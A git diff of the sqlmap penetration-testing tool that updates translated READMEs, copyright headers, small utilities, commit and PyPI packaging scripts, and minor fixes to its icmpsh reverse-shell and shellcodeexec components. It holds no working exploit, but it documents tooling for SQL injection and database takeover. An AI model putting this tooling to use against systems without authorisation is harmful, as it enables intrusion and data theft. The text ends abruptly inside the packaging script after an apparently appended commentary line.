[スクリーンショット集](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) + +インストール +---- + +最新のtarballを [こちら](https://github.com/sqlmapproject/sqlmap/tarball/master) から、最新のzipballを [こちら](https://github.com/sqlmapproject/sqlmap/zipball/master) からダウンロードできます。 + +[Git](https://github.com/sqlmapproject/sqlmap) レポジトリをクローンして、sqlmapをダウンロードすることも可能です。: + + git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev + +sqlmapは、 [Python](http://www.python.org/download/) バージョン **2.6.x** または **2.7.x** がインストールされていれば、全てのプラットフォームですぐに使用できます。 + +使用法 +---- + +基本的なオプションとスイッチの使用法をリストするには: + + python sqlmap.py -h + +全てのオプションとスイッチの使用法をリストするには: + + python sqlmap.py -hh + +実行例を [こちら](https://asciinema.org/a/46601) で見ることができます。 +sqlmapの概要、機能の一覧、全てのオプションやスイッチの使用法を例とともに、 [ユーザーマニュアル](https://github.com/sqlmapproject/sqlmap/wiki/Usage) で確認することができます。 + +リンク +---- + +* ホームページ: http://sqlmap.org +* ダウンロード: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) or [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master) +* コミットのRSSフィード: https://github.com/sqlmapproject/sqlmap/commits/master.atom +* 課題管理: https://github.com/sqlmapproject/sqlmap/issues +* ユーザーマニュアル: https://github.com/sqlmapproject/sqlmap/wiki +* よくある質問 (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ +* Twitter: [@sqlmap](https://twitter.com/sqlmap) +* デモ: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos) +* スクリーンショット: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots diff --git a/doc/translations/README-pt-BR.md b/doc/translations/README-pt-BR.md index 63a0bafc8..ce5e42621 100644 --- a/doc/translations/README-pt-BR.md +++ b/doc/translations/README-pt-BR.md @@ -1,5 +1,6 @@ -sqlmap -== +# sqlmap + +[![Build 
Status](https://api.travis-ci.org/sqlmapproject/sqlmap.svg?branch=master)](https://api.travis-ci.org/sqlmapproject/sqlmap) [![Python 2.6|2.7](https://img.shields.io/badge/python-2.6|2.7-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/doc/COPYING) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap) sqlmap é uma ferramenta de teste de penetração de código aberto que automatiza o processo de detecção e exploração de falhas de injeção SQL. Com essa ferramenta é possível assumir total controle de servidores de banco de dados em páginas web vulneráveis, inclusive de base de dados fora do sistema invadido. Ele possui um motor de detecção poderoso, empregando as últimas e mais devastadoras técnicas de teste de penetração por SQL Injection, que permite acessar a base de dados, o sistema de arquivos subjacente e executar comandos no sistema operacional. @@ -18,7 +19,7 @@ Você pode baixar o arquivo tar mais recente clicando [aqui] De preferência, você pode baixar o sqlmap clonando o repositório [Git](https://github.com/sqlmapproject/sqlmap): - git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev + git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev sqlmap funciona em [Python](http://www.python.org/download/) nas versões **2.6.x** e **2.7.x** em todas as plataformas. @@ -33,7 +34,7 @@ Para obter a lista completa de opções faça: python sqlmap.py -hh -Você pode encontrar alguns exemplos [aqui](https://gist.github.com/stamparm/5335217). +Você pode encontrar alguns exemplos [aqui](https://asciinema.org/a/46601). Para ter uma visão geral dos recursos do sqlmap, lista de recursos suportados e a descrição de todas as opções, juntamente com exemplos, aconselhamos que você consulte o [manual do usuário](https://github.com/sqlmapproject/sqlmap/wiki). Links @@ -45,9 +46,6 @@ Links * Issue tracker: https://github.com/sqlmapproject/sqlmap/issues * Manual do Usuário: https://github.com/sqlmapproject/sqlmap/wiki * Perguntas frequentes (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ -* Mailing list subscription: https://lists.sourceforge.net/lists/listinfo/sqlmap-users -* Mailing list RSS feed: http://rss.gmane.org/messages/complete/gmane.comp.security.sqlmap -* Mailing list archive: http://news.gmane.org/gmane.comp.security.sqlmap * Twitter: [@sqlmap](https://twitter.com/sqlmap) * Demonstrações: [#1](http://www.youtube.com/user/inquisb/videos) e [#2](http://www.youtube.com/user/stamparm/videos) * Imagens: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots diff --git a/doc/translations/README-tr-TR.md b/doc/translations/README-tr-TR.md new file mode 100644 index 000000000..f44bd97fb --- /dev/null +++ b/doc/translations/README-tr-TR.md @@ -0,0 +1,53 @@ +# sqlmap + +[![Build Status](https://api.travis-ci.org/sqlmapproject/sqlmap.svg?branch=master)](https://api.travis-ci.org/sqlmapproject/sqlmap) [![Python 2.6|2.7](https://img.shields.io/badge/python-2.6|2.7-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/doc/COPYING) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap) + +sqlmap sql injection açıklarını otomatik olarak tespit ve istismar etmeye yarayan açık kaynak bir penetrasyon aracıdır. 
sqlmap gelişmiş tespit özelliğinin yanı sıra penetrasyon testleri sırasında gerekli olabilecek bir çok aracı, -uzak veritabınınından, veri indirmek, dosya sistemine erişmek, dosya çalıştırmak gibi - işlevleri de barındırmaktadır. + + +Ekran görüntüleri +---- + +![Screenshot](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png) + + +İsterseniz özelliklerin tanıtımının yapıldığı [collection of screenshots](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) sayfasını ziyaret edebilirsiniz. + + +Kurulum +---- + +[Buraya](https://github.com/sqlmapproject/sqlmap/tarball/master) tıklayarak en son sürüm tarball'ı veya [buraya](https://github.com/sqlmapproject/sqlmap/zipball/master) tıklayarak zipbal'ı indirebilirsiniz. + +Veya tercihen, [Git](https://github.com/sqlmapproject/sqlmap) reposunu klonlayarak indirebilirsiniz + + git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev + +sqlmap [Python](http://www.python.org/download/) sitesinde bulunan **2.6.x** and **2.7.x** versiyonları ile bütün platformlarda çalışabilmektedir. + +Kullanım +---- + + +Bütün basit seçeneklerin listesini gösterir + + python sqlmap.py -h + +Bütün seçenekleri gösterir + + python sqlmap.py -hh + +Program ile ilgili örnekleri [burada](https://asciinema.org/a/46601) bulabilirsiniz. Daha fazlası içinsqlmap'in bütün açıklamaları ile birlikte bütün özelliklerinin, örnekleri ile bulunduğu [manuel sayfamıza](https://github.com/sqlmapproject/sqlmap/wiki/Usage) bakmanızı tavsiye ediyoruz + +Links +---- + +* Anasayfa: http://sqlmap.org +* İndirme bağlantıları: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) or [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master) +* Commitlerin RSS beslemeleri: https://github.com/sqlmapproject/sqlmap/commits/master.atom +* Hata takip etme sistemi: https://github.com/sqlmapproject/sqlmap/issues +* Kullanıcı Manueli: https://github.com/sqlmapproject/sqlmap/wiki +* Sıkça Sorulan Sorular(SSS): https://github.com/sqlmapproject/sqlmap/wiki/FAQ +* Twitter: [@sqlmap](https://twitter.com/sqlmap) +* Demolar: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos) +* Ekran görüntüleri: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots diff --git a/doc/translations/README-zh-CN.md b/doc/translations/README-zh-CN.md index c3b8b2941..b94454da2 100644 --- a/doc/translations/README-zh-CN.md +++ b/doc/translations/README-zh-CN.md @@ -1,6 +1,6 @@ -sqlmap -== +# sqlmap +[![Build Status](https://api.travis-ci.org/sqlmapproject/sqlmap.svg?branch=master)](https://api.travis-ci.org/sqlmapproject/sqlmap) [![Python 2.6|2.7](https://img.shields.io/badge/python-2.6|2.7-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/doc/COPYING) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap) sqlmap 是一个开源的渗透测试工具,可以用来自动化的检测,利用SQL注入漏洞,获取数据库服务器的权限。它具有功能强大的检测引擎,针对各种不同类型数据库的渗透测试的功能选项,包括获取数据库中存储的数据,访问操作系统文件甚至可以通过外带数据连接的方式执行操作系统命令。 @@ -18,7 +18,7 @@ sqlmap 是一个开源的渗透测试工具,可以用来自动化的检测, 推荐你从 [Git](https://github.com/sqlmapproject/sqlmap) 仓库获取最新的源代码: - git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev + git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev sqlmap 可以运行在 [Python](http://www.python.org/download/) **2.6.x** 和 **2.7.x** 版本的任何平台上 @@ -33,7 +33,7 @@ sqlmap 可以运行在 [Python](http://www.python.org/download/) **2.6.x** 和 python sqlmap.py 
-hh -你可以从 [这里](https://gist.github.com/stamparm/5335217) 看到一个sqlmap 的使用样例。除此以外,你还可以查看 [使用手册](https://github.com/sqlmapproject/sqlmap/wiki)。获取sqlmap所有支持的特性、参数、命令行选项开关及说明的使用帮助。 +你可以从 [这里](https://asciinema.org/a/46601) 看到一个sqlmap 的使用样例。除此以外,你还可以查看 [使用手册](https://github.com/sqlmapproject/sqlmap/wiki/Usage)。获取sqlmap所有支持的特性、参数、命令行选项开关及说明的使用帮助。 链接 ---- @@ -44,9 +44,6 @@ sqlmap 可以运行在 [Python](http://www.python.org/download/) **2.6.x** 和 * Issue tracker: https://github.com/sqlmapproject/sqlmap/issues * 使用手册: https://github.com/sqlmapproject/sqlmap/wiki * 常见问题 (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ -* 邮件讨论列表: https://lists.sourceforge.net/lists/listinfo/sqlmap-users -* 邮件列表 RSS 订阅: http://rss.gmane.org/messages/complete/gmane.comp.security.sqlmap -* 邮件列表归档: http://news.gmane.org/gmane.comp.security.sqlmap * Twitter: [@sqlmap](https://twitter.com/sqlmap) * 教程: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos) * 截图: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots diff --git a/extra/__init__.py b/extra/__init__.py index 8d7bcd8f0..942d54d8f 100644 --- a/extra/__init__.py +++ b/extra/__init__.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/extra/beep/__init__.py b/extra/beep/__init__.py index 8d7bcd8f0..942d54d8f 100644 --- a/extra/beep/__init__.py +++ b/extra/beep/__init__.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/extra/beep/beep.py b/extra/beep/beep.py index cd8ef9be5..2f1d10c80 100644 --- a/extra/beep/beep.py +++ b/extra/beep/beep.py @@ -3,7 +3,7 @@ """ beep.py - Make a beep sound -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/extra/cloak/__init__.py b/extra/cloak/__init__.py index 8d7bcd8f0..942d54d8f 100644 --- a/extra/cloak/__init__.py +++ b/extra/cloak/__init__.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/extra/cloak/cloak.py b/extra/cloak/cloak.py index a94f6756f..b93583711 100755 --- a/extra/cloak/cloak.py +++ b/extra/cloak/cloak.py @@ -3,7 +3,7 @@ """ cloak.py - Simple file encryption/compression utility -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ @@ -24,17 +24,19 @@ def hideAscii(data): return retVal -def cloak(inputFile): - f = open(inputFile, 'rb') - data = zlib.compress(f.read()) - f.close() +def cloak(inputFile=None, data=None): + if data is None: + with open(inputFile, "rb") as f: + data = f.read() - return hideAscii(data) + return hideAscii(zlib.compress(data)) -def decloak(inputFile): - f = open(inputFile, 'rb') +def decloak(inputFile=None, data=None): + if data is None: + with open(inputFile, "rb") as f: + data = f.read() try: - data = zlib.decompress(hideAscii(f.read())) + data = zlib.decompress(hideAscii(data)) except: print 'ERROR: the provided input file \'%s\' 
does not contain valid cloaked content' % inputFile sys.exit(1) diff --git a/extra/dbgtool/__init__.py b/extra/dbgtool/__init__.py index 8d7bcd8f0..942d54d8f 100644 --- a/extra/dbgtool/__init__.py +++ b/extra/dbgtool/__init__.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/extra/dbgtool/dbgtool.py b/extra/dbgtool/dbgtool.py index 4d3dc8c5e..fe5c1cd23 100644 --- a/extra/dbgtool/dbgtool.py +++ b/extra/dbgtool/dbgtool.py @@ -3,7 +3,7 @@ """ dbgtool.py - Portable executable to ASCII debug script converter -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/extra/icmpsh/icmpsh-s.c b/extra/icmpsh/icmpsh-s.c index 5c127d843..af30618f9 100644 --- a/extra/icmpsh/icmpsh-s.c +++ b/extra/icmpsh/icmpsh-s.c @@ -99,7 +99,7 @@ void usage(char *path) printf(" -h this screen\n"); printf(" -b num maximal number of blanks (unanswered icmp requests)\n"); printf(" before quitting\n"); - printf(" -s bytes maximal data buffer size in bytes (default is 64 bytes)\n\n", DEFAULT_MAX_DATA_SIZE); + printf(" -s bytes maximal data buffer size in bytes (default is %u bytes)\n\n", DEFAULT_MAX_DATA_SIZE); printf("In order to improve the speed, lower the delay (-d) between requests or\n"); printf("increase the size (-s) of the data buffer\n"); } @@ -203,8 +203,6 @@ int main(int argc, char **argv) PROCESS_INFORMATION pi; int status; unsigned int max_data_size; - struct hostent *he; - // set defaults target = 0; diff --git a/extra/icmpsh/icmpsh_m.py b/extra/icmpsh/icmpsh_m.py index 36fe44982..6e96952b3 100644 --- a/extra/icmpsh/icmpsh_m.py +++ b/extra/icmpsh/icmpsh_m.py @@ -76,7 +76,7 @@ def main(src, dst): # Instantiate an IP packets decoder decoder = ImpactDecoder.IPDecoder() - while 1: + while True: cmd = '' # Wait for incoming replies diff --git a/extra/mssqlsig/update.py b/extra/mssqlsig/update.py index 67d7ee6aa..368558bf4 100644 --- a/extra/mssqlsig/update.py +++ b/extra/mssqlsig/update.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ @@ -43,7 +43,7 @@ def updateMSSQLXML(): return - releases = re.findall("class=\"BCC_DV_01DarkBlueTitle\">SQL Server\s(.+?)\sBuilds", mssqlVersionsHtmlString, re.I | re.M) + releases = re.findall("class=\"BCC_DV_01DarkBlueTitle\">SQL Server\s(.+?)\sBuilds", mssqlVersionsHtmlString, re.I) releasesCount = len(releases) # Create the minidom document @@ -74,7 +74,7 @@ def updateMSSQLXML(): stopIdx = mssqlVersionsHtmlString.index("SQL Server %s Builds" % releases[index + 1]) mssqlVersionsReleaseString = mssqlVersionsHtmlString[startIdx:stopIdx] - servicepackVersion = re.findall("[7\.0|2000|2005|2008|2008 R2]*(.*?)[\r]*\n", mssqlVersionsReleaseString, re.I | re.M) + servicepackVersion = re.findall("(7\.0|2000|2005|2008|2008 R2)*(.*?)[\r]*\n", mssqlVersionsReleaseString, re.I) for servicePack, version in servicepackVersion: if servicePack.startswith(" "): diff --git a/extra/runcmd/README.txt b/extra/runcmd/README.txt index 717800aa4..4d4caa8f8 100644 --- a/extra/runcmd/README.txt +++ b/extra/runcmd/README.txt @@ -1,3 +1,3 @@ -Files in this folder can be used to compile auxiliary program that 
can -be used for running command prompt commands skipping standard "cmd /c" way. -They are licensed under the terms of the GNU Lesser General Public License. +runcmd.exe is an auxiliary program that can be used for running command prompt +commands skipping standard "cmd /c" way. It is licensed under the terms of the +GNU Lesser General Public License. diff --git a/shell/runcmd.exe_ b/extra/runcmd/runcmd.exe_ similarity index 100% rename from shell/runcmd.exe_ rename to extra/runcmd/runcmd.exe_ diff --git a/extra/runcmd/windows/README.txt b/extra/runcmd/src/README.txt similarity index 100% rename from extra/runcmd/windows/README.txt rename to extra/runcmd/src/README.txt diff --git a/extra/runcmd/windows/runcmd.sln b/extra/runcmd/src/runcmd.sln similarity index 100% rename from extra/runcmd/windows/runcmd.sln rename to extra/runcmd/src/runcmd.sln diff --git a/extra/runcmd/windows/runcmd/runcmd.cpp b/extra/runcmd/src/runcmd/runcmd.cpp similarity index 100% rename from extra/runcmd/windows/runcmd/runcmd.cpp rename to extra/runcmd/src/runcmd/runcmd.cpp diff --git a/extra/runcmd/windows/runcmd/runcmd.vcproj b/extra/runcmd/src/runcmd/runcmd.vcproj similarity index 100% rename from extra/runcmd/windows/runcmd/runcmd.vcproj rename to extra/runcmd/src/runcmd/runcmd.vcproj diff --git a/extra/runcmd/windows/runcmd/stdafx.cpp b/extra/runcmd/src/runcmd/stdafx.cpp similarity index 100% rename from extra/runcmd/windows/runcmd/stdafx.cpp rename to extra/runcmd/src/runcmd/stdafx.cpp diff --git a/extra/runcmd/windows/runcmd/stdafx.h b/extra/runcmd/src/runcmd/stdafx.h similarity index 100% rename from extra/runcmd/windows/runcmd/stdafx.h rename to extra/runcmd/src/runcmd/stdafx.h diff --git a/extra/safe2bin/__init__.py b/extra/safe2bin/__init__.py index 8d7bcd8f0..942d54d8f 100644 --- a/extra/safe2bin/__init__.py +++ b/extra/safe2bin/__init__.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/extra/safe2bin/safe2bin.py b/extra/safe2bin/safe2bin.py index c91620ec6..fe16fbce9 100644 --- a/extra/safe2bin/safe2bin.py +++ b/extra/safe2bin/safe2bin.py @@ -3,7 +3,7 @@ """ safe2bin.py - Simple safe(hex) to binary format converter -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ @@ -19,14 +19,17 @@ from optparse import OptionParser # Regex used for recognition of hex encoded characters HEX_ENCODED_CHAR_REGEX = r"(?P\\x[0-9A-Fa-f]{2})" -# Regex used for recognition of representation for hex encoded invalid unicode characters -INVALID_UNICODE_CHAR_REGEX = r"(?P\\\?[0-9A-Fa-f]{2})" - # Raw chars that will be safe encoded to their slash (\) representations (e.g. 
newline to \n) SAFE_ENCODE_SLASH_REPLACEMENTS = "\t\n\r\x0b\x0c" # Characters that don't need to be safe encoded -SAFE_CHARS = "".join(filter(lambda x: x not in SAFE_ENCODE_SLASH_REPLACEMENTS, string.printable.replace('\\', ''))) +SAFE_CHARS = "".join(filter(lambda _: _ not in SAFE_ENCODE_SLASH_REPLACEMENTS, string.printable.replace('\\', ''))) + +# Prefix used for hex encoded values +HEX_ENCODED_PREFIX = r"\x" + +# Strings used for temporary marking of hex encoded prefixes (to prevent double encoding) +HEX_ENCODED_PREFIX_MARKER = "__HEX_ENCODED_PREFIX__" # String used for temporary marking of slash characters SLASH_MARKER = "__SLASH__" @@ -44,7 +47,8 @@ def safecharencode(value): retVal = value if isinstance(value, basestring): - if any(_ not in SAFE_CHARS for _ in value): + if any([_ not in SAFE_CHARS for _ in value]): + retVal = retVal.replace(HEX_ENCODED_PREFIX, HEX_ENCODED_PREFIX_MARKER) retVal = retVal.replace('\\', SLASH_MARKER) for char in SAFE_ENCODE_SLASH_REPLACEMENTS: @@ -53,6 +57,7 @@ def safecharencode(value): retVal = reduce(lambda x, y: x + (y if (y in string.printable or isinstance(value, unicode) and ord(y) >= 160) else '\\x%02x' % ord(y)), retVal, (unicode if isinstance(value, unicode) else str)()) retVal = retVal.replace(SLASH_MARKER, "\\\\") + retVal = retVal.replace(HEX_ENCODED_PREFIX_MARKER, HEX_ENCODED_PREFIX) elif isinstance(value, list): for i in xrange(len(value)): retVal[i] = safecharencode(value[i]) @@ -83,12 +88,6 @@ def safechardecode(value, binary=False): if binary: if isinstance(retVal, unicode): retVal = retVal.encode("utf8") - while True: - match = re.search(INVALID_UNICODE_CHAR_REGEX, retVal) - if match: - retVal = retVal.replace(match.group("result"), chr(ord(binascii.unhexlify(match.group("result").lstrip("\\?"))))) - else: - break elif isinstance(value, (list, tuple)): for i in xrange(len(value)): diff --git a/extra/shellcodeexec/windows/shellcodeexec.x32.exe_ b/extra/shellcodeexec/windows/shellcodeexec.x32.exe_ index 4d699f123..c4204cce6 100644 Binary files a/extra/shellcodeexec/windows/shellcodeexec.x32.exe_ and b/extra/shellcodeexec/windows/shellcodeexec.x32.exe_ differ diff --git a/extra/shutils/duplicates.py b/extra/shutils/duplicates.py index eac95ccf8..ac5219a5d 100644 --- a/extra/shutils/duplicates.py +++ b/extra/shutils/duplicates.py @@ -1,6 +1,6 @@ #!/usr/bin/env python -# Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +# Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) # See the file 'doc/COPYING' for copying permission # Removes duplicate entries in wordlist like files diff --git a/extra/shutils/postcommit-hook.sh b/extra/shutils/postcommit-hook.sh new file mode 100644 index 000000000..77ed2824c --- /dev/null +++ b/extra/shutils/postcommit-hook.sh @@ -0,0 +1,23 @@ +#!/bin/bash + +SETTINGS="../../lib/core/settings.py" + +declare -x SCRIPTPATH="${0}" + +FULLPATH=${SCRIPTPATH%/*}/$SETTINGS + +if [ -f $FULLPATH ] +then + LINE=$(grep -o ${FULLPATH} -e 'VERSION = "[0-9.]*"') + declare -a LINE + NEW_TAG=$(python -c "import re, sys, time; version = re.search('\"([0-9.]*)\"', sys.argv[1]).group(1); _ = version.split('.'); print '.'.join(_[:-1]) if len(_) == 4 and _[-1] == '0' else ''" "$LINE") + if [ -n "$NEW_TAG" ] + then + #git commit -am "Automatic monthly tagging" + echo "Creating new tag ${NEW_TAG}" + git tag $NEW_TAG + git push origin $NEW_TAG + echo "Going to push PyPI package" + /bin/bash ${SCRIPTPATH%/*}/pypi.sh + fi +fi diff --git a/extra/shutils/precommit-hook.sh b/extra/shutils/precommit-hook.sh new file 
mode 100644 index 000000000..3c2137ce2 --- /dev/null +++ b/extra/shutils/precommit-hook.sh @@ -0,0 +1,32 @@ +#!/bin/bash + +PROJECT="../../" +SETTINGS="../../lib/core/settings.py" +CHECKSUM="../../txt/checksum.md5" + +declare -x SCRIPTPATH="${0}" + +PROJECT_FULLPATH=${SCRIPTPATH%/*}/$PROJECT +SETTINGS_FULLPATH=${SCRIPTPATH%/*}/$SETTINGS +CHECKSUM_FULLPATH=${SCRIPTPATH%/*}/$CHECKSUM + +git diff $SETTINGS_FULLPATH | grep "VERSION =" > /dev/null && exit 0 + +if [ -f $SETTINGS_FULLPATH ] +then + LINE=$(grep -o ${SETTINGS_FULLPATH} -e 'VERSION = "[0-9.]*"') + declare -a LINE + INCREMENTED=$(python -c "import re, sys, time; version = re.search('\"([0-9.]*)\"', sys.argv[1]).group(1); _ = version.split('.'); _.append(0) if len(_) < 3 else _; _[-1] = str(int(_[-1]) + 1); month = str(time.gmtime().tm_mon); _[-1] = '0' if _[-2] != month else _[-1]; _[-2] = month; print sys.argv[1].replace(version, '.'.join(_))" "$LINE") + if [ -n "$INCREMENTED" ] + then + sed -i "s/${LINE}/${INCREMENTED}/" $SETTINGS_FULLPATH + echo "Updated ${INCREMENTED} in ${SETTINGS_FULLPATH}" + else + echo "Something went wrong in VERSION increment" + exit 1 + fi + git add "$SETTINGS_FULLPATH" +fi + +truncate -s 0 "$CHECKSUM_FULLPATH" +cd $PROJECT_FULLPATH && for i in $(find . -name "*.py" -o -name "*.xml" -o -iname "*_" | sort); do git ls-files $i --error-unmatch &>/dev/null && md5sum $i | stdbuf -i0 -o0 -e0 sed 's/\.\///' >> "$CHECKSUM_FULLPATH"; git add "$CHECKSUM_FULLPATH"; done diff --git a/extra/shutils/pydiatra.sh b/extra/shutils/pydiatra.sh new file mode 100644 index 000000000..e4f901c74 --- /dev/null +++ b/extra/shutils/pydiatra.sh @@ -0,0 +1,7 @@ +#!/bin/bash + +# Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) +# See the file 'doc/COPYING' for copying permission + +# Runs py2diatra on all python files (prerequisite: pip install pydiatra) +find . -wholename "./thirdparty" -prune -o -type f -iname "*.py" -exec py2diatra '{}' \; | grep -v bare-except diff --git a/extra/shutils/pyflakes.sh b/extra/shutils/pyflakes.sh old mode 100644 new mode 100755 diff --git a/extra/shutils/pylint.py b/extra/shutils/pylint.py index 440f638a6..f0b684322 100644 --- a/extra/shutils/pylint.py +++ b/extra/shutils/pylint.py @@ -20,8 +20,8 @@ def check(module): print "CHECKING ", module pout = os.popen("pylint --rcfile=/dev/null %s" % module, 'r') for line in pout: - if re.match("E....:.", line): - print line + if re.match("\AE:", line): + print line.strip() if __RATING__ and "Your code has been rated at" in line: print line score = re.findall("\d.\d\d", line)[0] diff --git a/extra/shutils/pypi.sh b/extra/shutils/pypi.sh new file mode 100644 index 000000000..02dba1cfd --- /dev/null +++ b/extra/shutils/pypi.sh @@ -0,0 +1,171 @@ +#!/bin/bash + +declare -x SCRIPTPATH="${0}" +SETTINGS="${SCRIPTPATH%/*}/../../lib/core/settings.py" +VERSION=$(cat $SETTINGS | grep -E "^VERSION =" | cut -d '"' -f 2 | cut -d '.' 
-f 1-3) +TYPE=pip +TMP_DIR=/tmp/pypi +mkdir $TMP_DIR +cd $TMP_DIR +cat > $TMP_DIR/setup.py << EOF +#!/usr/bin/env python + +""" +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) +See the file 'doc/COPYING' for copying permission +""" + +from setuptools import setup, find_packages + +setup( + name='sqlmap', + version='$VERSION', + description="Automatic SQL injection and database takeover tool", + author='Bernardo Damele Assumpcao Guimaraes, Miroslav Stampar', + author_email='bernardo@sqlmap.org, miroslav@sqlmap.org', + url='https://sqlmap.org', + download_url='https://github.com/sqlmapproject/sqlmap/archive/$VERSION.zip', + license='GNU General Public License v2 (GPLv2)', + packages=find_packages(), + include_package_data=True, + zip_safe=False, + # https://pypi.python.org/pypi?%3Aaction=list_classifiers + classifiers=[ + 'Development Status :: 5 - Production/Stable', + 'License :: OSI Approved :: GNU General Public License v2 (GPLv2)', + 'Natural Language :: English', + 'Operating System :: OS Independent', + 'Programming Language :: Python', + 'Environment :: Console', + 'Topic :: Database', + 'Topic :: Security', + ], + entry_points={ + 'console_scripts': [ + 'sqlmap = sqlmap.sqlmap:main', + ], + }, +) +EOF +wget "https://github.com/sqlmapproject/sqlmap/archive/$VERSION.zip" -O sqlmap.zip +unzip sqlmap.zip +rm sqlmap.zip +mv "sqlmap-$VERSION" sqlmap +cat > sqlmap/__init__.py << EOF +#!/usr/bin/env python + +""" +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) +See the file 'doc/COPYING' for copying permission +""" + +import os +import sys + +sys.dont_write_bytecode = True +sys.path.insert(0, os.path.dirname(os.path.abspath(__file__))) +EOF +cat > README.rst << "EOF" +sqlmap +====== + +|Build Status| |Python 2.6|2.7| |License| |Twitter| + +sqlmap is an open source penetration testing tool that automates the +process of detecting and exploiting SQL injection flaws and taking over +of database servers. It comes with a powerful detection engine, many +niche features for the ultimate penetration tester and a broad range of +switches lasting from database fingerprinting, over data fetching from +the database, to accessing the underlying file system and executing +commands on the operating system via out-of-band connections. + +Screenshots +----------- + +.. figure:: https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png + :alt: Screenshot + + +You can visit the `collection of +screenshots `__ +demonstrating some of features on the wiki. + +Installation +------------ + +You can use pip to install and/or upgrade the sqlmap to latest (monthly) tagged version with: :: + + pip install --upgrade sqlmap + +Alternatively, you can download the latest tarball by clicking +`here `__ or +latest zipball by clicking +`here `__. + +If you prefer fetching daily updates, you can download sqlmap by cloning the +`Git `__ repository: + +:: + + git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev + +sqlmap works out of the box with +`Python `__ version **2.6.x** and +**2.7.x** on any platform. + +Usage +----- + +To get a list of basic options and switches use: + +:: + + python sqlmap.py -h + +To get a list of all options and switches use: + +:: + + python sqlmap.py -hh + +You can find a sample run `here `__. To +get an overview of sqlmap capabilities, list of supported features and +description of all options and switches, along with examples, you are +advised to consult the `user's +manual `__. 
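As a quick sanity check of the package this script uploads, the pip-based flow described in the generated README.rst, together with the `console_scripts` entry point declared in the setup.py heredoc above (`sqlmap = sqlmap.sqlmap:main`), would be exercised roughly as follows; this is a sketch, not part of the patch:

    # install or upgrade to the latest monthly tagged release from PyPI
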